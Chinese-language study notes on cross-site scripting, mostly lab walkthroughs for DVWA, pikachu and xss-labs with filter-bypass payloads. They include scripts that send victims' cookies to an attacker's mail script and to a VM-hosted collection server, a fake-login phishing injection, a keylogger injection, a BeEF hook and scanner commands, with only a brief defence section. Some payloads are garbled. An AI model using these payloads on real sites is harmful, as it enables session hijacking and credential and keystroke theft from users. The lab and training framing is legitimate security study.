3-XSS渗透与防御

1、HTTP协议回顾

XSS又名跨站脚本攻击

web页面登陆页面，往往有一个“记住密码”功能 ---> Cookie

1.1 HTTP流程

1.2 HTTP特点：

• 请求应答模式
• 灵活可拓展
• 可靠传输
• 无状态stateless -- 客户端每次请求都是完全独立的，没有任何联系

2、客户端的Cookie

显示：每个请求都是独立的

需求：保持会话

目的：为了解决stateless无状态的影响

1、第一次访问，浏览器会保存服务器下发的Cookie

2、客户端在本机将cookie保存到内存或磁盘下面

3、后面每次请求都带上cookie

2.1 cookie内容

key/value 格式，例如：

name = wuya
id = 99
islogin = 1

一般包含：内容value、起作用的路径、起作用的域名、到期时间

（需要计算过期时间的Cookie会保存在磁盘。没有过期时间的，属于临时cookie，则是保存在内存）

2.2 cookie特点

• 明文
• 可修改
• 数量和大小受限（视浏览器而定）

Cookie的用途

• 记住登陆状态
• 跟踪用户行为（广告推送等等）

3、服务器的Session

转换思路：将一大串保存在服务端，且只通过COOKIE字段下发一个字段SESSID

减少浏览器客户端的负担，只需要看客户端的cookie中是否有已登录的SessionID

3.1 session流程

客户端 --> 第一次访问：开启会话，将登陆信息保存到session --> 服务端

客户端 <-- 如选择记住密码，则将sessionID写入cookie并下发 <-- 服务端

客户端 --> 第二次访问，从session中取出信息，判断登陆状态 --> 服务端

3.2 cookie和session的区别

4、JavaScript操作Cookie

想法：可不可以复制别的浏览器cookie中的sessionid？从而达到直接登录？

答案是可行的！

问题：如何远程获取到其他用户的cookie？

4.1 JavaScript语法

获取：document.coookie;

设置：document.cookie = "username=wuya";

修改：创建一个cookie覆盖

删除：将cookie过期时间，设置为如1999年

想法：将脚本注入到网页服务器中，并运行

5、脚本注入网页-XSS

前提：输入框存在提交，并且会解析运行JavaScript的脚本

POST请求如：<script>alert(1)</script>

GET 请求如：?url=javascript:alert(/wuya/)

5.1 XSS：Cross Site Script

恶意攻击者利用web页面的漏洞，插入一些恶意代码，当用户访问页面时，代码就会执行，这个时候就达到了攻击的目的。

JavaScript、Java、VBScript、ActiveX、Flash

反射型、存储型、DOM型(通过HTML的结构实现)

5.2 反射型XSS

5.3 存储型XSS

如注册、发评论等等

6、获取Cookie发送邮件实战

6.1 首先写一个mail.js文件

var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://localhost/xss/sendmail.php?mycookie=' + encodeURIComponent(document.cookie);

6.2 存储型注入

在注册时输入：<script = \'http://localhost/xss/mail.js'></script>

6.3 执行脚本

当有人点击或访问，就会执行mail.js，其中sendmail.php会将当前访问该路径的用户的cookie，通过参数?mycookie转发邮件到黑客的qq邮箱中

7、DVWA靶场XSS

默认账号：admin

默认密码：password

7.1 XSS(Reflected)

7.1.1 Security = Low

payload = <script>alert('xxx')</script>

7.1.2 Security = Medium

做了一个str_replace()将script过滤成' '空

$name = str_replace( '<script>', '', $_GET[ 'name' ] );

绕过：大小写、双写

payload = <Script>alert('xxx')</script>

payload = <sc<script>ript>alert(123456)</script>

7.1.3 Security = High

运用了正则表达式

$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

绕过：运用其他标签

payload = <删除img src=" " onerror="alert('XSS')">

7.1.4 Security = Impossible

运了htmlspecialchars()函数

将特殊字符转换为HTML实体符号，相当于被编码

7.2 XSS(Stored)

7.2.1 Security = Low

发现Name字段存在长度限制，但是Message字段没有

payload = <script>alert(123456)</script>

发现一旦刷新，每访问一次，就会攻击一次，出现弹窗

7.2.2 Security = Medium

可以看到，由于对message参数使用了htmlspecialchars函数进行编码，因此无法再通过message参数注入XSS代码，但是对于name参数，只是简单过滤<script>字符串，仍然存在存储型的XSS。

绕过：抓包改name参数为<sc<script>ript>alert(/xss/)</script>

也可以审查元素，修改长度限制

7.2.3 Security = High

7.2.4 Security = Impossible

8、XSS后台平台搭建（pikachu靶场xss后台为例）

8.1 搭建

在本机搭建pikachu（修改inc配置文件）

在Win7虚拟机搭建pikachu XSS后台

相当于：用本机的XSS漏洞环境，将cookie传到虚拟机Win7的XSS后台数据库中

8.2 Payload

8.2.1 反射型xss(get)：<script>alert("xu")</script>

在Win7的Cookie.php中修改重定向地址，让别人误以为只是刷新了一下

<script>document.location='http://虚拟机ip/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

http://192.168.125.131:8080/

8.2.2 反射型xss(post)

在修改Win7中post.html

攻击方式：将带毒的页面(Win7中的post.html)发给别人，一旦点击会访问有xss漏洞的本机地址，然后自动输入payload被拿cookie

最后访问带毒地址url：http://192.168.125.131:8080/pikachu/pkxss/xcookie/post.html

8.2.3 存储型xss（钓鱼xfish）

修改fish.php，弹出迷惑性的登陆界面

<script src="http://192.168.125.131:8080/pikachu/pkxss/xfish/fish.php"></script>

用法：将JS语句存储在留言板中，当有人访问留言板时候，就会弹窗输密码

8.2.4 存储型xss（获取键盘记录）

修改rk.js

<script src="http://192.168.125.131:8080/pikachu/pkxss/rkeypress/rk.js"></script>

用法：将JS语句存储在留言板中，当有人访问，可以看到其键盘输入

8.3 其他XSS平台

https://github.com/78778443/xssplatform

Kali：beef-xss（密码/etc/beef-xss/config.yaml）

在反射型XSS处，执行 <script src="http://Kali的ip:3000/hook.js"></script>

发现在beef上线，可以在command处对受害机器进行操作

9、XSS检查和利用

9.1 测试XSS的payload

9.1.1XSSER (https://github.com/epsylon/xsser)(https://xsser.03c8.net)

实例：

由于DVWA需要登录，所以需要给他一个cookei

xsser -u "http://ip地址/dvwa/vulnerabilities/" -g "/xss_r/?name=XSS" --cookie="security=low; PHPSESSID=do462brkn1gnerpusf1f5aqd30; BEEFHOOK=d83iUtVEPA40EzTeQuAGilAcNsvuKbYCssJDO2qhLkKyPNK37CIIV5NZpvaINYqVPT4erug7xcrfqPCh" -s -v --reverse-check

9.1.2 XSSSTRIKE（https://github.com/s0md3v/XSStrike）

任意切换python版本！

添加python可选项：

update-alternatives --install /usr/bin/python python /usr/bin/python2.7 2 # 添加Python2可选项，优先级为2，优先级高的数字大，此处设置python2优先级高于python3

然后输入update-alternatives --config python

删除python可选项

update-alternatives --remove python /usr/bin/python2.7

get类型命令：python xsstrike.py -u 'http://xxx/xxx.php?message=123&subbmit=submit'

post类型命令：python xsstrike.py -u "xxx/xx.php" --data 'name=1'

10、XSS防御方法

入口：

识别：正则，处理：替换

出口：

echo ""，document.write();htmlspecialchars

WAF

11、xss-labs闯关游戏

思路：使用万能payload看看做了什么处理！再查看页面源码！

<sCr<scrscRiptipt>ipt>OonN&apos;\"<>

&apos是单引号

第一关

payload = ?name=<script>alert("xss")</script>

第二关

查看页面代码，发现没有任何过滤，且输入在value中需要闭合

payload = "> <script>alert("xss")</script>

第三关

过滤了尖括号，所以闭合+触发onmouseover，插入脚本当鼠标滑过输入框触发

payload = ' onmouseover='alert(/xss/)

第四关

<script " ' Oonn>

发现过滤了尖括号

payload = " onmouseover="alert(1)

第五关

过滤替换了script和on关键字，使用伪协议生成带alert的超链接

payload = "><a href = "javascript:alert(/xss/)">click</a>

第六关

过滤替换了script和on=以及href关键字，使用伪协议+大小写hERf绕过

payload = "><a hREf = "javascript:alert(/xss/)">click</a>

第七关

script标签被过滤，闭合+双写绕过

payload = "> <SCRscriptIPT>alert(1)</SCRscriptIPT>

第八关

提供了友情链接，使用伪协议javascript:alert(/xss/)，发现script被替换

对内容进行一个Unicode编码



payload = javascript:alert(/xss/)

第九关

你的链接不合法！

payload = javascript:alert('http://www.baidu.com')

第十关

GET类型请求，尖括号不行，但是发现三个隐藏的input标签，闭合触发事件

然后因为标签是hidden的，导致无法触发标签的事件监听，所以需要覆盖掉标签的hidden属性，或者使用//注释掉

payload = ?t_sort=click" type="button" onclick="alert(/xss/)

payload = ?t_sort=" onmouseover="alert(1)" type=""//

第十一关

通过BP抓包，修改Referer值，发现会传递到代码中



payload = click" type="button" onclick="alert(1)

portswigger

<custom-tag onmouseover='alert("xss")'>

"><body onresize=alert(1)>